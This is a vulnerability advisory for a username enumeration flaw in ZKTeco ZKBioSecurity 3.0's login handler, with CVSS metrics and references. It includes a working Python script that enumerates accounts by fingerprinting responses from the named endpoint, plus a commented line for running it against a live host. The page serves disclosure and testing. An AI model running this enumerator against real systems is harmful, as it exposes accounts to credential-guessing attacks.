CVE-2016-20030
CRITICAL 9.8 (CVSS 3.1) | Exploitation: PoC
Description
ZKTeco ZKBioSecurity 3.0 (build 3.0.1.0_R_230) contains a username enumeration vulnerability in its login handler, authLoginAction!login.do. The application's response differs depending on whether the value supplied in the username parameter corresponds to an existing account, and the page reports that this holds even when only partial characters of a username are submitted. An unauthenticated attacker can therefore send repeated login requests with varying username values and separate valid accounts from invalid ones by comparing the responses, with no valid credentials required. The leaked usernames are the first half of a credential-guessing attack against the same login form; the CNA-assigned CVSS vector scores full confidentiality, integrity and availability impact, which reflects that follow-on compromise rather than the information leak on its own.
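The response-differential technique the description relies on, written out as an added example (this is not the Zero Science Lab proof of concept and not ZKBioSecurity code). It establishes a baseline from a few usernames that cannot exist, then flags any candidate whose response fingerprint departs from that baseline. The base URL, the password field name, the HTTP method and the simulated server's reply bodies are assumptions made for the demo; only the endpoint name and the username parameter come from the advisory.

```python
import hashlib
import secrets
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List

# Endpoint named in the advisory; the parameter "username" is also from the advisory.
LOGIN_PATH = "/authLoginAction!login.do"


def fingerprint(status: int, body: bytes) -> str:
    """Reduce a response to a comparable token: status code plus a hash of the
    whitespace-stripped body, so cosmetic differences do not create noise."""
    digest = hashlib.sha256(b"".join(body.split())).hexdigest()[:16]
    return f"{status}:{digest}"


def http_probe(base_url: str, username: str, password: str = "not-the-password") -> str:
    """Submit one login attempt and return its fingerprint.
    Assumptions: form-encoded POST and a field named "password"; adjust to the
    real form if the target differs."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + LOGIN_PATH, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return fingerprint(resp.status, resp.read())
    except urllib.error.HTTPError as err:  # non-2xx replies are still signal
        return fingerprint(err.code, err.read())


def enumerate_users(probe: Callable[[str], str], candidates: List[str],
                    baseline_samples: int = 3) -> Dict[str, List[str]]:
    """Classify candidates by comparing each response to the response for
    usernames that are guaranteed not to exist.

    Refuses to classify if the baseline itself is unstable (e.g. anti-automation
    jitter or rotating CSRF tokens in the body), which would otherwise produce
    false positives for every candidate."""
    baseline = {probe(f"zz-nonexistent-{i}-{secrets.token_hex(4)}")
                for i in range(baseline_samples)}
    if len(baseline) != 1:
        raise RuntimeError("baseline responses differ; fingerprint needs normalising")
    unknown_user_fp = baseline.pop()

    result: Dict[str, List[str]] = {"valid": [], "invalid": []}
    for name in candidates:
        bucket = "valid" if probe(name) != unknown_user_fp else "invalid"
        result[bucket].append(name)
    return result


# Constructed stand-in for the vulnerable server so the example runs offline.
# The account names and reply bodies are invented; they are not real ZKBioSecurity output.
KNOWN_USERS = {"admin", "operator"}


def simulated_probe(username: str) -> str:
    if username in KNOWN_USERS:
        return fingerprint(200, b'{"ret":"fail","msg":"wrong password"}')
    return fingerprint(200, b'{"ret":"fail","msg":"no such user"}')


if __name__ == "__main__":
    wordlist = ["admin", "bob", "operator", "guest"]
    print(enumerate_users(simulated_probe, wordlist))
    # Against a live host (assumed URL), swap in the network probe:
    # print(enumerate_users(lambda u: http_probe("http://192.0.2.10:8088", u), wordlist))
```

The baseline check is the part worth keeping when adapting this: a login page that varies its body per request (nonce, timestamp, session id) will make every candidate look "valid" unless `fingerprint` is tightened to the field that actually differs. The same fingerprinting logic, run from the defender's side with known-good and known-bad usernames, is a quick way to confirm whether a patched build still leaks.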
Metadata
Severity & Metrics
9.8 CRITICAL (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Affected products (1)
| Vendor | Product | Platform | Versions |
|---|---|---|---|
| ZKTeco Inc. | ZKTeco ZKBioSecurity | — | 3.0.1.0_R_230 |
Weakness (CWE)
| CWE | Source | Description |
|---|---|---|
| CWE-551 | cna | Incorrect Behavior Order: Authorization Before Parsing and Canonicalization |
CVSS scores (2)
| Score | Severity | Version | Source | Vector |
|---|---|---|---|---|
| 9.8 | CRITICAL | 3.1 | cna | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 9.3 | CRITICAL | 4.0 | cna | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
References (4)
- Zero Science Lab Disclosure https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5366.php
- IBM X-Force Exchange https://exchange.xforce.ibmcloud.com/vulnerabilities/116485
- Packet Storm Security https://packetstormsecurity.com/files/138573
- VulnCheck Advisory: ZKTeco ZKBioSecurity 3.0 User Enumeration via authLoginAction https://www.vulncheck.com/advisories/zkteco-zkbiosecurity-user-enumeration-via-authloginaction